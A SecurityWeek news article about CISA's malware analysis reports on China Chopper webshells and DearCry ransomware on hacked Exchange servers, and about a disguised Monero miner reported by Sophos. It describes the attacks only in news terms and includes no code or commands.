Connect with us

Hi, what are you looking for?


Malware & Threats

CISA Details Malware Found on Hacked Exchange Servers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week published details on additional malware identified on compromised Microsoft Exchange servers, namely China Chopper webshells and DearCry ransomware.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) this week published details on additional malware identified on compromised Microsoft Exchange servers, namely China Chopper webshells and DearCry ransomware.

The malware operators target Exchange servers through a series of vulnerabilities that were made public on March 3, the same day Microsoft released patches for them. The bugs had been targeted before the public announcement and activity surrounding them increased soon after.

On March 3, CISA published an advisory on the exploitation of the Exchange vulnerabilities, and this week it announced an update for that alert, to add Malware Analysis Reports (MARs) that include information on additional attacks.

The first of these provides details on China Chopper webshells that were identified on Exchange servers following initial compromise through the aforementioned vulnerabilities, and which provide adversaries with control over the infected machine.

A total of 10 webshells were identified, CISA notes, but these should not be considered an all-inclusive list of webshells that threat actors are leveraging in attacks targeting Exchange servers.

Additionally, CISA is warning of assaults on Microsoft Exchange that are attempting to drop the DearCry ransomware on vulnerable servers.

Also referred to as DoejoCrypt, DearCry is the first ransomware family known to target Exchange servers. For over two weeks, the Black Kingdom/Pydomer ransomware has been engaging in similar attempts too.

Advertisement. Scroll to continue reading.

In the newly shared MARs, CISA has included tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs), to help defenders identify and remediate potential compromise.

The attacks on Microsoft Exchange servers, however, are far more diverse, and also involve the use of cryptominers in some cases. In fact, Microsoft themselves warned roughly two weeks ago of activity involving the Lemon Duck cryptocurrency botnet.

Now, Sophos reveals that the targeting of Exchange servers for crypto-mining purposes dates all the way back to March 9, hours after Microsoft’s Patch Tuesday updates that addressed the exploited vulnerabilities were released. Ever since, the security firm says, an unknown actor has been compromising servers to deploy a malicious Monero miner.

What makes this attack stand out, however, is the fact that the malicious payload itself is hosted on a compromised Exchange server and is being retrieved through a PowerShell command. The payload masquerades as a legitimate utility, named QuickCPU.

Within days, the miner was loaded onto multiple compromised servers, with the crypto-currency output spiking significantly. The activity continues, albeit at a much lower pace, as the miner has lost some of the infected servers.

Related: CISA Releases Tool to Detect Microsoft 365 Compromise

Related: CISA, FBI Warn of Attacks Targeting Fortinet FortiOS

Related: CISA Warns Organizations About Attacks on Cloud Services

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join security experts as they discuss ZTNA’s untapped potential to both reduce cyber risk and empower the business.


Join Microsoft and Finite State for a webinar that will introduce a new strategy for securing the software supply chain.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...


The recent ransomware attack targeting Rackspace was conducted by a cybercrime group named Play using a new exploitation method, the cloud company revealed this...

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.